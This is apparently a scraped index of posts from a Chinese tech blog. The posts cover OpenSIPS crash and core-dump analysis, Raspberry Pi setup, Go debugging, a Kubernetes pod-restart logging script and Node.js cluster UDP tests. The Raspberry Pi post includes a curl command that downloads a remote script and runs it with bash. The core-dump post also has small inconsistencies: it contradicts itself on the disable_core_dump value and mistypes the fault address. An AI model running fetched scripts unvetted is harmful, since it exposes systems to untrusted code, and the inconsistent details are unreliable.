\u0026lsquo;free_size\u0026rsquo;, 空闲内存 \u0026lsquo;fragments\u0026rsquo;, \u0026lsquo;active_dialogs\u0026rsquo;, 接通状态的通话 \u0026rsquo;early_dialogs\u0026rsquo;, 振铃状态的通话 \u0026lsquo;inuse_transactions\u0026rsquo;, 正在使用的事务 \u0026lsquo;waiting_udp\u0026rsquo;, 堆积的udp消息 \u0026lsquo;waiting_tcp\u0026rsquo; 堆积的tcp消息 当然还有很多的一些指标,可以使用:opensipsctl fifo get_statistics all来获取。","title":"生产环境监控告警"},{"content":"core dump文件在哪里? 一般情况下,opensips在崩溃的时候,会产生core dump文件。这个文件一般位于跟目录下,名字如core.xxxx等的。\ncore dump文件一般大约有1G左右,所以当产生core dump的时候,要保证系统的磁盘空间是否足够。\n如何开启core dump? 第一,opensips脚本中有个参数叫做disable_core_dump, 这个参数默认为no, 也就是启用core dump, 可以将这个参数设置为no, 来禁用core dump。但是生产环境一般建议还是开启core dump, 否则服务崩溃了,就只能看日志,无法定位到具体的崩溃代码的位置。\ndisable_core_dump=yes 第二,还需要在opensips启动之前,运行:ulimit -c unlimited, 这个命令会让opensips core dump的时候,不会限制core dump文件的大小。一般来说core dump文件的大小是共享内存 + 私有内存。\n第三,opensips进程的用户如果不是root, 那么可能没有权限将core dump文件写到/目录下。有两个解决办法,\n用root用户启动opensips进程 使用-w 参数配置opensips的工作目录,core dump文件将会写到对应的目录中。例如:opensips -w /var/log 如果core dump失败是因为权限的问题, opensips的日志文件中将会打印:\nCan\u0026#39;t open \u0026#39;core.xxxx\u0026#39; at \u0026#39;/\u0026#39;: Permission denied 如何分析core dump文件? 使用gdb\ngdb $(which opensips) core.12333 # 进入gdb调试之后, 输入bt full, 会打印详细的错误栈信息 bt full 没有产生core dump文件,如何分析崩溃原因? 使用objdump。\n一般来说opensips崩溃后,日志文件中一般会出现下面的信息\nkernel: opensips[8954]: segfault at 1ea72b5 ip 00000000004be532 sp 00007ffe9e1e6df0 error 4 in opensips[400000+203000] 我们从中取出几个关键词\nat 1ea72b5 尝试访问的内存地址偏移 error 4 错误的类型 fault was an instruction fetch ip 00000000004be532 指令指针的位置, 注意这个4be532 sp 00007ffe9e1e6df0 栈指针的位置 400000+203000 x86架构 /* * Page fault error code bits * bit 0 == 0 means no page found, 1 means protection fault * bit 1 == 0 means read, 1 means write * bit 2 == 0 means kernel, 1 means user-mode * bit 3 == 1 means use of reserved bit detected * bit 4 == 1 means fault was an instruction fetch */ #define PF_PROT (1\u0026lt;\u0026lt;0) #define PF_WRITE (1\u0026lt;\u0026lt;1) #define PF_USER (1\u0026lt;\u0026lt;2) #define PF_RSVD (1\u0026lt;\u0026lt;3) #define PF_INSTR (1\u0026lt;\u0026lt;4) 使用objdump, 可以将二进制文件,反汇编找到对应代码的位置。比如说我们可以在反汇编的输出中搜索4be532,就可以找到对应代码的位置。\nobjdump -j .text -ld -C -S $(which opensips) \u0026gt; op.txt 然后我们在op.txt中搜索4be523, 就能找到对饮的源码或者函数的位置。然后根据源码分析问题。\n参考 https://www.opensips.org/Documentation/TroubleShooting-Crash https://stackoverflow.com/questions/2549214/interpreting-segfault-messages https://stackoverflow.com/questions/2179403/how-do-you-read-a-segfault-kernel-log-message/2179464#2179464 https://rgeissert.blogspot.com/p/segmentation-fault-error.html ","permalink":"https://wdd.js.org/opensips/ch7/crash/","summary":"core dump文件在哪里? 一般情况下,opensips在崩溃的时候,会产生core dump文件。这个文件一般位于跟目录下,名字如core.xxxx等的。\ncore dump文件一般大约有1G左右,所以当产生core dump的时候,要保证系统的磁盘空间是否足够。\n如何开启core dump? 第一,opensips脚本中有个参数叫做disable_core_dump, 这个参数默认为no, 也就是启用core dump, 可以将这个参数设置为no, 来禁用core dump。但是生产环境一般建议还是开启core dump, 否则服务崩溃了,就只能看日志,无法定位到具体的崩溃代码的位置。\ndisable_core_dump=yes 第二,还需要在opensips启动之前,运行:ulimit -c unlimited, 这个命令会让opensips core dump的时候,不会限制core dump文件的大小。一般来说core dump文件的大小是共享内存 + 私有内存。\n第三,opensips进程的用户如果不是root, 那么可能没有权限将core dump文件写到/目录下。有两个解决办法,\n用root用户启动opensips进程 使用-w 参数配置opensips的工作目录,core dump文件将会写到对应的目录中。例如:opensips -w /var/log 如果core dump失败是因为权限的问题, opensips的日志文件中将会打印:\nCan\u0026#39;t open \u0026#39;core.xxxx\u0026#39; at \u0026#39;/\u0026#39;: Permission denied 如何分析core dump文件? 使用gdb\ngdb $(which opensips) core.12333 # 进入gdb调试之后, 输入bt full, 会打印详细的错误栈信息 bt full 没有产生core dump文件,如何分析崩溃原因? 使用objdump。\n一般来说opensips崩溃后,日志文件中一般会出现下面的信息\nkernel: opensips[8954]: segfault at 1ea72b5 ip 00000000004be532 sp 00007ffe9e1e6df0 error 4 in opensips[400000+203000] 我们从中取出几个关键词","title":"opensips崩溃分析"},{"content":"排查日志 opensips的log_stderror参数决定写日志的位置,\nyes 写日志到标准错误 no 写日志到syslog服务(默认) 如果使用默认的syslog服务,那么日志将会可能写到以下两个文件中。\n/var/log/messages /var/log/syslog 一般情况下,分析/var/log/messages日志,可以定位到无法启动的原因。\n如果日志文件中无法定位到具体原因,那么就可以将log_stderror设置为yes。\n注意:往标准错误中打印的日志,往往比网日志文件中打印的更详细。而且有些时候,我发现这个错误在标准错误中打印了,但是却不会输出到日志文件中。\n所以,看标准错误的日志,往往更容易定位到问题。\n","permalink":"https://wdd.js.org/opensips/ch7/can-not-run/","summary":"排查日志 opensips的log_stderror参数决定写日志的位置,\nyes 写日志到标准错误 no 写日志到syslog服务(默认) 如果使用默认的syslog服务,那么日志将会可能写到以下两个文件中。\n/var/log/messages /var/log/syslog 一般情况下,分析/var/log/messages日志,可以定位到无法启动的原因。\n如果日志文件中无法定位到具体原因,那么就可以将log_stderror设置为yes。\n注意:往标准错误中打印的日志,往往比网日志文件中打印的更详细。而且有些时候,我发现这个错误在标准错误中打印了,但是却不会输出到日志文件中。\n所以,看标准错误的日志,往往更容易定位到问题。","title":"opensips无法启动"},{"content":"选择那个版本的系统? 不要过高的估算树莓派的性能,最好不要选择那些具有漂亮界面的ubuntu或者manjaro, 因为当你使用这些带桌面的系统时,很大概率界面能让你卡的想把树莓派砸了。\n所以优先选择不带图形界面的lite版本的系统,如果确实需要的话,可以再安装lxde\n网线插了,还是无法联网 插了网线,网口上的绿灯也是在闪烁,但是eth0就是无法联网成功。真是气人。\n解决方案: 编辑 /etc/network/interfaces, 将里面的内容改写成下面的,然后重启树莓派。\n这个配置文件的涵义是:在启动时就使用eth0有线网卡,并且使用dhcp给这个网卡自动配置IP\nauto eth0 iface eth0 inet dhcp iface etho inet6 dhcp source-directory /etc/network/interfaces.d 无桌面版本,如何手工安装桌面 首先安装lxde\nsudo apt update sudo apt install lxde -y 然后通过raspi-config, 配置默认从桌面启动\nsudo rasip-config 选择系统配置, 按回车键进入 选择Boot/Auto login, 按回车进入\n选择Desktop, 回车确认。保存之后,退出重启。\n键盘无法输入| | 在linux中是管道的意思,然而我的键盘却无法输入。最终发现是键盘布局的原因。\n在图标上右键,选择配置\n注意这里是US, 这是正常的。如果是UK,就是英式布局,是有问题的,需要把UK的删除,重新增加一个US的。\n如何安装最新版本的neovim? 树莓派使用apt安装的neovim, 版本太老了。很多插件使用上都会体验不好。所以建议安装最新版的neovim。\nsudo apt install snapd sudo snap install --classic nvim 注意: nvim的默认安装的路径是/snap/bin, 所以你需要把这个路径设置到PATH里,才能使用nvim. 如何安装最新的golang? 打开这个页面 https://golang.google.cn/dl/\n因为树莓是armhf架构的,所以这这么多版本里,只有armv6l这个版本是能够在树莓派上运行的。\n压缩包下载之后解压,里面的go/bin目录中就有go的可执行文件,只要将这个目录暴露到PTAH中,就能使用golang了。\n如何安装最新版本的node.js curl -L https://gitee.com/wangduanduan/install-node/raw/master/bin/n -o n bash n lts 如何安装谷歌浏览器? sudo apt full-upgrade sudo apt install chromium-browser -y 使用清华apt源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/ # 编辑 `/etc/apt/sources.list` 文件,删除原文件所有内容,用以下内容取代: deb http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contrib rpi deb-src http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contrib rpi # 编辑 `/etc/apt/sources.list.d/raspi.list` 文件,删除原文件所有内容,用以下内容取代: deb http://mirrors.tuna.tsinghua.edu.cn/raspberrypi/ buster main ui 如何安装截图工具? sudo apt-get install -y flameshot 使用树莓派在浏览器上看视频怎么样? 非常卡\n","permalink":"https://wdd.js.org/posts/2021/08/uuvor0/","summary":"选择那个版本的系统? 不要过高的估算树莓派的性能,最好不要选择那些具有漂亮界面的ubuntu或者manjaro, 因为当你使用这些带桌面的系统时,很大概率界面能让你卡的想把树莓派砸了。\n所以优先选择不带图形界面的lite版本的系统,如果确实需要的话,可以再安装lxde\n网线插了,还是无法联网 插了网线,网口上的绿灯也是在闪烁,但是eth0就是无法联网成功。真是气人。\n解决方案: 编辑 /etc/network/interfaces, 将里面的内容改写成下面的,然后重启树莓派。\n这个配置文件的涵义是:在启动时就使用eth0有线网卡,并且使用dhcp给这个网卡自动配置IP\nauto eth0 iface eth0 inet dhcp iface etho inet6 dhcp source-directory /etc/network/interfaces.d 无桌面版本,如何手工安装桌面 首先安装lxde\nsudo apt update sudo apt install lxde -y 然后通过raspi-config, 配置默认从桌面启动\nsudo rasip-config 选择系统配置, 按回车键进入 选择Boot/Auto login, 按回车进入\n选择Desktop, 回车确认。保存之后,退出重启。\n键盘无法输入| | 在linux中是管道的意思,然而我的键盘却无法输入。最终发现是键盘布局的原因。\n在图标上右键,选择配置\n注意这里是US, 这是正常的。如果是UK,就是英式布局,是有问题的,需要把UK的删除,重新增加一个US的。\n如何安装最新版本的neovim? 树莓派使用apt安装的neovim, 版本太老了。很多插件使用上都会体验不好。所以建议安装最新版的neovim。\nsudo apt install snapd sudo snap install --classic nvim 注意: nvim的默认安装的路径是/snap/bin, 所以你需要把这个路径设置到PATH里,才能使用nvim. 如何安装最新的golang? 打开这个页面 https://golang.google.cn/dl/\n因为树莓是armhf架构的,所以这这么多版本里,只有armv6l这个版本是能够在树莓派上运行的。\n压缩包下载之后解压,里面的go/bin目录中就有go的可执行文件,只要将这个目录暴露到PTAH中,就能使用golang了。","title":"树莓派3b+踩坑记录"},{"content":"关于js sdk的设计,这篇文档基本上详细介绍了很多的点,值得深入阅读一遍。https://github.com/hueitan/javascript-sdk-design\n然而最近在重构某个js sdk时,也发现了一些问题,这个问题并不存在于上述文章中的。\njs sdk在收到服务端的响应时,直接将server端返回的错误码给到用户。\n这里会有一个问题,这个响应码,实际上是js sdk和server之间的消息交流。并不是js sdk和用户之间的消息交流。\n如果我们将server端的响应直接返回给用户,则js sdk可以理解为是一个透明代理。用户将会和server端产生强耦合。如果server端有不兼容的变化,将会直接影响到用户的使用。\n所以较好的做法是js sdk将这个错误封装为另一个种表现形式,和server端分离出来。\n","permalink":"https://wdd.js.org/posts/2021/08/kbcih7/","summary":"关于js sdk的设计,这篇文档基本上详细介绍了很多的点,值得深入阅读一遍。https://github.com/hueitan/javascript-sdk-design\n然而最近在重构某个js sdk时,也发现了一些问题,这个问题并不存在于上述文章中的。\njs sdk在收到服务端的响应时,直接将server端返回的错误码给到用户。\n这里会有一个问题,这个响应码,实际上是js sdk和server之间的消息交流。并不是js sdk和用户之间的消息交流。\n如果我们将server端的响应直接返回给用户,则js sdk可以理解为是一个透明代理。用户将会和server端产生强耦合。如果server端有不兼容的变化,将会直接影响到用户的使用。\n所以较好的做法是js sdk将这个错误封装为另一个种表现形式,和server端分离出来。","title":"js sdk 跨层穿透问题"},{"content":"本来打算用gdb调试的,看了官方的文档https://golang.org/doc/gdb, 官方更推荐使用delve这个工具调试。\n我的电脑是linux, 所以就用如下的命令安装。\ngo install github.com/go-delve/delve/cmd/dlv@latest\n我要调试的并不是一个代码而是一个测试的代码。\n当执行测试的时候报错的位置是xxx/demo/demo_test.go, 200行\ndlv test moduleName/demo \u0026gt; b demo_test.go:200 # 在文件的对应行设置端点 \u0026gt; bp # print all breakpoint \u0026gt; c # continue to exe \u0026gt; p variableName ","permalink":"https://wdd.js.org/golang/debug-with-dlv/","summary":"本来打算用gdb调试的,看了官方的文档https://golang.org/doc/gdb, 官方更推荐使用delve这个工具调试。\n我的电脑是linux, 所以就用如下的命令安装。\ngo install github.com/go-delve/delve/cmd/dlv@latest\n我要调试的并不是一个代码而是一个测试的代码。\n当执行测试的时候报错的位置是xxx/demo/demo_test.go, 200行\ndlv test moduleName/demo \u0026gt; b demo_test.go:200 # 在文件的对应行设置端点 \u0026gt; bp # print all breakpoint \u0026gt; c # continue to exe \u0026gt; p variableName ","title":"Debug With Dlv"},{"content":"程序可能大部分时间都是按照正常的逻辑运行,然而也有少数的概率,程序发生异常。\n优秀程序,不仅仅要考虑正常运行,还需要考虑两点:\n如何处理异常 如何在发生异常后,快速定位原因 正常的处理如果称为收益的话,异常的处理就是要能够及时止损。\n能稳定运行364天的程序,很可能因为一天的问题,就被客户抛弃。因为这一天的损失,就可能会超过之前收益的总和。\n异常应当如何处理 如果事情有变坏的可能,不管这种可能性有多小,它总会发生。《莫非定律》\n对于程序来说,避免变坏的方法只有一个,就是不要运行程序(纯粹废话😂)。\n1. 及时崩溃 var conn = nil var maxConnectTimes = 3 var reconnectDelay = 3 * 1000 var currentReconnectTimes = 0 var timeId = 0 func InitDb () { conn = connect(\u0026#34;数据库\u0026#34;) conn.on(\u0026#34;connected\u0026#34;, ()=\u0026gt;{ // 将当前重连次数重制为0 currentReconnectTimes = 0 }) conn.on(\u0026#34;error\u0026#34;, ReconnectDb) } func ReconnectDb () { conn.Close() // 如果重连次数大于最大重连次数,将不在重连 if currentReconnecTimes \u0026gt; maxConnectTimes { return } // 如果已经催在重连的任务,则先关闭 if timeId != 0 { cleanTimeout(timeId) } // 当前重连次数增加 currentReconnectTimes++ // 开始延迟重连 timeId = setTimeout(InitDb, reconnectDelay) } 2. 如何快速定位问题 第一,代码的敬畏之心 第二,及时告警。日志,或者http请求 第三,编程时,就要考虑异常。例如程序依赖 MQ或者Mysql,当与之交互的链接断开后,应该怎样处理? 第四,多实例问题考虑 第五,检查清单\n","permalink":"https://wdd.js.org/posts/2021/08/brh6mu/","summary":"程序可能大部分时间都是按照正常的逻辑运行,然而也有少数的概率,程序发生异常。\n优秀程序,不仅仅要考虑正常运行,还需要考虑两点:\n如何处理异常 如何在发生异常后,快速定位原因 正常的处理如果称为收益的话,异常的处理就是要能够及时止损。\n能稳定运行364天的程序,很可能因为一天的问题,就被客户抛弃。因为这一天的损失,就可能会超过之前收益的总和。\n异常应当如何处理 如果事情有变坏的可能,不管这种可能性有多小,它总会发生。《莫非定律》\n对于程序来说,避免变坏的方法只有一个,就是不要运行程序(纯粹废话😂)。\n1. 及时崩溃 var conn = nil var maxConnectTimes = 3 var reconnectDelay = 3 * 1000 var currentReconnectTimes = 0 var timeId = 0 func InitDb () { conn = connect(\u0026#34;数据库\u0026#34;) conn.on(\u0026#34;connected\u0026#34;, ()=\u0026gt;{ // 将当前重连次数重制为0 currentReconnectTimes = 0 }) conn.on(\u0026#34;error\u0026#34;, ReconnectDb) } func ReconnectDb () { conn.Close() // 如果重连次数大于最大重连次数,将不在重连 if currentReconnecTimes \u0026gt; maxConnectTimes { return } // 如果已经催在重连的任务,则先关闭 if timeId != 0 { cleanTimeout(timeId) } // 当前重连次数增加 currentReconnectTimes++ // 开始延迟重连 timeId = setTimeout(InitDb, reconnectDelay) } 2.","title":"面向异常编程todo"},{"content":"一般来说,监控pod状态重启和告警,可以使用普罗米修斯或者kubewatch。\n但是如果你只想将某个pod重启了,往某个日志文件中写一条记录,那么下面的方式将是非常简单的。\n实现的思路是使用kubectl 获取所有pod的状态信息,统计发生过重启的pod, 然后和之前的重启次数做对比,如果比之前记录的次数大,那么肯定是发生过重启了。\n#!/bin/bash now=$(date \u0026#34;+%Y-%m-%d %H:%M:%S\u0026#34;) log_file=\u0026#34;/var/log/pod.restart.log\u0026#34; ns=\u0026#34;some-namespace\u0026#34; echo $now start pod restart monitor \u0026gt;\u0026gt; $log_file # touch一下之前的记录文件,防止文件不存在 touch restart.old.log # 生成本次的统计数据 kubectl get pod -n $ns -o wide | awk \u0026#39;$4 \u0026gt; 0{print $1,$4}\u0026#39; | grep -v NAME \u0026gt; restart.now.log # 按行读取本次统计数据 # 数据格式为:podname 重启次数 while read line do # pod name name=$(echo $line | awk \u0026#39;{print $1}\u0026#39;) # 重启次数 count=$(echo $line | awk \u0026#39;{print $2}\u0026#39;) # 检查本次重启的pod名称是否在之前的记录中存在 if grep $name restart.old.log; then # 如果存在,则取出之前记录的重启次数 t=$(grep $name restart.old.log | awk \u0026#39;{print $2}\u0026#39;) # 和本次记录的重启次数比较,如果本次的重启次数较大 # 则说明pod一定重启过 if [ $count -gt $t]; then echo $now ERROR pod_restart $name \u0026gt;\u0026gt; $log_file fi else # 如果重启的pod不存在之前的记录中,也说明pod重启过 echo $now ERROR pod_restart $name \u0026gt;\u0026gt; $log_file fi done \u0026lt; restart.now.log # 删除老的记录文件 rm -f restart.old.log # 将新的记录文件重命名为老的记录文件 mv restart.now.log restart.old.log 然后可以将上面的脚本做成定时任务,每分钟执行一次。那么就可以将pod重启的信息写入文件。\n然后配合一些日志监控的程序,就可以监控日志文件。然后提取关键词,最后发送告警信息。\n其实我们也可以在写告警日志文件的同时,通过curl发送http请求,来发送告警通知。\n在公有云上,可以使用钉钉的通知webhook, 也是非常方便的。\n","permalink":"https://wdd.js.org/posts/2021/07/giqfii/","summary":"一般来说,监控pod状态重启和告警,可以使用普罗米修斯或者kubewatch。\n但是如果你只想将某个pod重启了,往某个日志文件中写一条记录,那么下面的方式将是非常简单的。\n实现的思路是使用kubectl 获取所有pod的状态信息,统计发生过重启的pod, 然后和之前的重启次数做对比,如果比之前记录的次数大,那么肯定是发生过重启了。\n#!/bin/bash now=$(date \u0026#34;+%Y-%m-%d %H:%M:%S\u0026#34;) log_file=\u0026#34;/var/log/pod.restart.log\u0026#34; ns=\u0026#34;some-namespace\u0026#34; echo $now start pod restart monitor \u0026gt;\u0026gt; $log_file # touch一下之前的记录文件,防止文件不存在 touch restart.old.log # 生成本次的统计数据 kubectl get pod -n $ns -o wide | awk \u0026#39;$4 \u0026gt; 0{print $1,$4}\u0026#39; | grep -v NAME \u0026gt; restart.now.log # 按行读取本次统计数据 # 数据格式为:podname 重启次数 while read line do # pod name name=$(echo $line | awk \u0026#39;{print $1}\u0026#39;) # 重启次数 count=$(echo $line | awk \u0026#39;{print $2}\u0026#39;) # 检查本次重启的pod名称是否在之前的记录中存在 if grep $name restart.","title":"监控pod重启并写日志文件"},{"content":"本来我的目的是使用cluster模块的fork出多个进程,让各个进程都能处理udp消息的。但是最终测试发现,实际上仅有一个进程处理了绝大数消息,其他的进程,要么不处理消息,要么处理的非常少的消息。\n然而使用cluster来开启http服务的多进程,却能够达到多进程的负载。\nserver端demo代码: const cluster = require(\u0026#39;cluster\u0026#39;) const numCPUs = require(\u0026#39;os\u0026#39;).cpus().length const { logger } = require(\u0026#39;./logger\u0026#39;) const dgram = require(\u0026#39;dgram\u0026#39;) // const { createHTTPServer, createUDPServer } = require(\u0026#39;./app\u0026#39;) const port = 8088 if (cluster.isMaster) { for (let i = 0; i \u0026lt; numCPUs; i++) { cluster.fork() } cluster.on(\u0026#39;exit\u0026#39;, (worker, code, signal) =\u0026gt; { logger.info(`工作进程 ${worker.process.pid} 已退出`) }) } else { const server = dgram.createSocket({ type: \u0026#39;udp4\u0026#39;, reuseAddr: true }) server.on(\u0026#39;error\u0026#39;, (err) =\u0026gt; { logger.info(`udp server error:\\n${err.stack}`) server.close() }) server.on(\u0026#39;message\u0026#39;, (msg, rinfo) =\u0026gt; { logger.info(`${process.pid} udp server got: ${msg} from ${rinfo.address}:${rinfo.port}`) }) server.on(\u0026#39;listening\u0026#39;, () =\u0026gt; { const address = server.address() logger.info(`udp server listening ${address.address}:${address.port}`) }) server.bind(port) } 日志库如下:\nconst logger = require(\u0026#39;pino\u0026#39;)() module.exports = { logger } 启动服务之后,从日志中可以看到:启动了四个进程。\n{\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194869,\u0026#34;pid\u0026#34;:98795,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194870,\u0026#34;pid\u0026#34;:98797,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194872,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194876,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} 然后我们使用nc, 来向这个udpserver发送消息\nnc 0.0.0.0 8088 ... 然后观察server的日志发现:\n基本上所有的消息都被最后一个进程消费 pid 98798 消费一个消息 其他进程没有消费消息 {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601201509,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: adf\\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202172,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: asdflasdf\\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202382,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202545,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202678,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202832,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203332,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203420,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203500,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203609,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203669,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203752,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203836,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203920,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204004,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204089,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204172,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204256,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204340,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204423,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204507,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204590,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204674,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204759,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204842,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204926,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} 